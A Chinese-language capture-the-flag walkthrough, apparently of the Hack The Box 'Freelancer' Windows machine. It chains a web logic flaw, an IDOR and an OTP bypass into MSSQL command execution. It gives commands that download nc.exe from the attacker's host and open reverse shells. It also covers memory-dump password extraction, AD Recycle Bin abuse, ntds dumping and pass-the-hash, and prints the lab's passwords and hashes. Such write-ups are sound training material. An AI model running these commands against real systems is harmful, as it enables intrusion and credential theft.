基本信息
端口扫描
80和一些常规windows端口:
1 | nmap -sC -sV 10.10.11.5 |
80
需要加hosts:
1 | 10.10.11.5 freelancer.htb |
一个就活相关网站:
目录扫描
目录扫描可以发现admin
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://freelancer.htb/ --exclude-length 197 |
Employer
页面上有两个注册入口,但Employer注册后是默认未激活状态:
recovery
这里是处理逻辑上的错误,未激活的账号虽然不能登录,但可以选择忘记密码,输入注册时的安全问题答案后设置新密码,这时候账户被自动激活,可以正常登录:
OTP QR-CODE
然后可以发现一个使用qr-code登录的功能:
分析qrcode内容,是这样的链接,中间一段base64看起来是用户id,后面是otp的md5:
1 | http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/ |
job
employer可以发布工作,测试发布,然后查看job信息可以看到employer信息查看接口,使用用户id:
users
这个接口存在idor,枚举可以发现admin的id为2,以及其他一些用户:
1 | admin |
admin
这里又是一个逻辑问题,OTP代码没和用户id绑定,直接修改中间用户id部分,访问到admin用户:
1 | http://freelancer.htb/accounts/login/otp/Mg==/239e3746d021264f38bdd160f52a419c/ |
现在我们可以访问admin,是django管理后台:
SQL Terminal
可以看到有一个SQL Terminal可以直接执行sql:
后面就是sql一步步枚举模拟,然后xp_cmdshell:
- 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands
1 | SELECT SYSTEM_USER; |
sql_svc
然后就是执行命令获取shell,有杀软,简单的nc获取shell:
1 | powershell -exec bypass -c 'wget http://10.10.14.10:7777/nc.exe -O C:\windows\Tasks\nc.exe' |
信息
然后在sql_svc的download目录中mssql相关目录,一个配置文件中得到一些密码:
1 | SQLSVCPASSWORD="IL0v3ErenY3ager" |
mikasaAckerman & user flag
简单尝试可以发现mikasaAckerman用户复用了其中一个密码:
1 | .\RunasCs.exe mikasaAckerman IL0v3ErenY3ager -r 10.10.14.37:4444 powershell |
MEMORY.7z
mikasaAckerman桌面有个7z文件,根据邮件和7z文件名可以知道这是内存dump,那就下载到本地分析:
1 | ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao . -username miao -password miao |
解压之后就是内存dump,标准的volatility+mimikatz,或者windbg+mimikatz:
- volatilityfoundation/volatility: An advanced memory forensics framework
https://github.com/volatilityfoundation/volatility - Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
1 | .load C:\mimikatz_trunk\x64\mimilib.dll |
windbg+mimikatz有点问题,显示的不全,可以用MemProcFS加插件:
- ufrisk/MemProcFS: MemProcFS
https://github.com/ufrisk/MemProcFS - ufrisk/MemProcFS-plugins
https://github.com/ufrisk/MemProcFS-plugins
1 | .\MemProcFS.exe -device ..\MEMORY.DMP |
dumps
从内存dump中提取出一些信息:
1 | Administrator acb3617b6b9da5dc7778092bdea6f3b8 v3ryS0l!dP@sswd#29 |
jmartinez path
根据内存中得到的密码规则,生成密码字典,枚举,发现jmartinez的密码,从这个用户开始有几种不同方式:
1 | v3ryS0l!dP@sswd#29 |
jmartinez在Account Operators组,可以直接操作其他账号
另外还有一种服务提权方式:
1 | sc.exe stop VMTools |
lorra199 path
另一个密码包含lorra199的变形,就是他的密码。登录lorra199:
1 | evil-winrm -u lorra199 -p 'PWN3D#l0rr@Armessa199' -i freelancer.htb |
AD Recycle Bin
lorra199在AD Recycle Bin组中,很早之前的Cascade也出现过这部分:
- Active Directory Object Recovery using the Recycle Bin
https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/ - Restore-ADObject (ActiveDirectory) | Microsoft Learn
https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps
可以成功恢复liza.kazanof,然后使用前面内存中得到的密码切换过去:
1 | Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects |
liza.kazanof
liza.kazanof有SeBackupPrivilege权限,直接卷影备份ntds和system然后dump即可:
- k4sth4/SeBackupPrivilege: Windows Privilege Escalation
https://github.com/k4sth4/SeBackupPrivilege
就按照里面的步骤备份ntds和system,然后下载到本地dump:
root flag
得到的Administrator hash登录:
1 | evil-winrm -u Administrator -H 0039318f1e8274633445bce32ad1a290 -i freelancer.htb |
hashdump
1 | ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system LOCAL |
参考资料
- 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands - volatilityfoundation/volatility: An advanced memory forensics framework
https://github.com/volatilityfoundation/volatility - Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps - ufrisk/MemProcFS: MemProcFS
https://github.com/ufrisk/MemProcFS - ufrisk/MemProcFS-plugins
https://github.com/ufrisk/MemProcFS-plugins - Active Directory Object Recovery using the Recycle Bin
https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/ - Restore-ADObject (ActiveDirectory) | Microsoft Learn
https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps - k4sth4/SeBackupPrivilege: Windows Privilege Escalation
https://github.com/k4sth4/SeBackupPrivilege